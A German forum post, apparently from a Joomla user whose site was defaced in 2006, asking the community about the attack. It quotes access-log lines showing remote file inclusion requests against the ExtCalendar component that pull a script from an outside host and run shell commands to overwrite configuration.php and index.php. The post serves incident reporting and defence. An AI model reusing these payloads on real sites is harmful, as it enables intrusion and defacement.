Habe durch die diversen THreats gelesen und schreibe sicher nix neues. Ich nahme an, das meine configuration.php mit den falschen Rechten ausgestattet war. Aber ich bin ganz happy, mein Provider bitete automatische Backups und so ist alles auf dem Stand von zwei Tagen vor Doomsday.
Allerdings dürfte vielleicht folgendes von Interesse sein: In den Logfiles habe ich vier Einträge gefunden, die mit dem Hack etwas zu tun haben. Und nein, ich will niemanden mit der "neuen" Erkenntnis belästigen, das Extcalender eine Lücke bietet. Schaut euch diese Einträge mal an:
81.214.177.35 - - [19/Jul/2006:23:59:30 +0200] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System]configuration.php HTTP/1.0" 200 12108 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.meine-site.xx"
und den hier:
81.214.177.35 - - [20/Jul/2006:00:02:46 +0200] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System]index.php HTTP/1.0" 200 12092 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.meine-site.xx"
Mit dem einen hackt er die configuration.php und mit dem anderen die index.php. Er bneutzt dazu ein Script, das auf einem Server mit der (zumindest temporären) IP Adresse 61.1.197.244 liegt. Die Seite kann man aufrufen (aber bitte nur mit aktivem Virenscanner).
Würde das der Joomla Gemeinde vielleicht irgendwie nutzen und uns helfen, solche fehlgeleiteten Menschen zur Einsicht zu bewegen, dass sie etwas falsches tun?
Es gibt noch zwei weitere Einträge, die ich nicht verstehe, vielleicht kann mir ja jemand erklären, wie es verstanden werden muss:
81.214.177.35 - - [20/Jul/2006:00:09:30 +0200] "GET / HTTP/1.1" 200 671 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Thehacker/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 2.8; .NET CLR 1.0.3705; InfoPath.2)" "www.meine-site.xx"
und der hier
81.214.177.35 - - [20/Jul/2006:00:19:56 +0200] "GET / HTTP/1.1" 200 671 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Thehacker" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 2.8; .NET CLR 1.0.3705; InfoPath.2)" "www.meine-site.xx"
^
Vielen Dank für Eure Bemühungen und in der Hoffnung auf eine freundlichere welt auch im Netz....
Martin


LinkBack URL
About LinkBacks
Zitieren
Lesezeichen